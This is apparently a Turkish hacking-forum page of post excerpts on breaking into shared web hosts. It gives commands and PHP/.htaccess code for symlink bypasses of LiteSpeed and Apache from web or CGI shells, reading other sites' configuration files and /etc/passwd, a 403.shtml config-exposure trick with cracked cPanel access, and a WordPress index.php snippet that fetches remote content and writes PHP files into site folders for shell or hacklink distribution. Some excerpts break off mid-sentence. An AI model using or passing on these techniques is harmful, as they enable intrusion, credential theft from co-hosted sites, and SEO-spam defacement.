Litespeed (ln -s) Bypass Method

Öncelikle selamun aleyküm, Bu dökümanda sizlere isimtescil gibi warez yada eski sürüm litespeed kullanan easy server ları nasıl geçiceğinizi kısa bi şekilde anlatıcağım. İlk olarak alfa shell kullanmanızı tavsiye ederim cgi shell kısmna gelip direk cgi nin olduğu dizinde komutları giriniz; $ mkdir configler $ cd configler Ardından symlink(python symlink shell i alfadaki) i açık…


WordPress php dağıtma kodu

Büyük ihtimalle hacklinkciler kullanır veya shell dağıtımları için Php kod wordpress klasörlerine php yazdırıyor siz bunu wordpressin index.php üstüne ekleyin Şu şekildede çalıştırırsınız index.php?under=dosya Under yanına yazdığınız her şey klasörlere php olarak geçicek örnek alırsak wp-includes/dosya.php gibi Dosya.php içeriği php kodun içindeki bir sitedeki txt dosyasından çekilecek ve otomatik yazdırılacak her ihtimale karşı olarak yinede…


Alexa rank gösterme php

Hacklink panelleri veya kendi sitenizde felan kullanabilirsiniz Code: <?phpfunction AlexaRank($domain){ $uri = ‘http://data.alexa.com/data?cli=10&dat=snbamz&url=’; $uri .= $domain; $xml = simplexml_load_file($uri); if (isset($xml->SD[1]->POPULARITY)) return (int) $xml->SD[1]->POPULARITY->attributes()->TEXT; } echo number_format(AlexaRank($_GET[“site”])); ?> dosya.php?site=underfamily.org gibi girince direk alexa rank gösterir


Php yi farklı uzantılarda çalıştırma (.htaccess)

RewriteEngine On RewriteRule ^dosyaniz.html$ dosyaniz.php [L,QSA] “dosyanız.html” ismi ile içerisinde php kodları olan dosyayı sunucuya upload edip ardından yukardaki kodlarla aynı dizinde bir .htaccess dosyası açmanız yeterli olucaktır o ve alt dizinlerdeki tüm “.html” uzantılı dosyalarda php kodlarını çalıştırabilceksiniz bu methodu “.png – .jpeg” şeklindede kullanabilirsiniz. çoğu sunucularda bypass yaparken func. bypasslamak için kullanılan yada…


c1 bypass ile config okuma(apache)

c1.tar.gz dosyasını $ tar -xvzf c1.tar.gz ile çıkartalım daha sonra /home/user/public_html/configuation.php olarak aratalım büyük ihtimal girer apache serverlerde giriyor girmezse c1 klasörüne geri gelip ln -s /home/user/public_html/configuation.php apache.txt yazalım ve c1/apache.txt alanına girelim girmezse sunucu komut yerinden cat apache.txt yazarak çağıralım bundada girmezse cpanel crack yapalım ve apache.txt dosyasını cpanel file managerdan görüntüleyelim büyük ihtimalle…


Linux server bypass sufleleri/taktikler #1

/etc/passwd dizini olarak cgi yada back connect olduğunuz sunucudan hedef dosyayı nasıl çekebilirsiniz methodlar halinde göstereceğim; 1) ln -s /etc/passwd underfamily.txt -> cgi shell de kullanınız. 2) less +F /etc/passwd -> back connect olduğunuzda. 3) curl -O file:///etc/passwd -> cgi shell de kullanınız. 4) ln -s /etc/passwd README -> cgi shell de kullanınız. (HEADER –…


cPanel 403 forbidden bypass(.shtml)

cPanel crack ile cpanele erişim sağlayalım => TIKLA cPanelden hata sayfalarına girelim ve 403.shtml dosyasını açalım Shelle girelim komut yerine ln -s /home/underfamily/public_html/configuation.php 403.shtml yazalım Ardından 403.shtml dosyasını açtığımız bölüme F5 atarsak 403.shtml görüntülemede config bilgilerini görebilirsiniz.


/etc/passwd okuyan PHP (Secure serverlar için)

<?phpfor($uid=0;$uid<2000;$uid++){ // cat /etc/passwd $nothing = posix_getpwuid($uid); if (!empty($nothing)) { while (list ($key, $val) = each($nothing)){ print “$val:”; } print ““; } } ?> Php kodunu kullanmanız yeterli olucaktır /etc/passwd çekilmeyen çoğu sw de çalışmakta.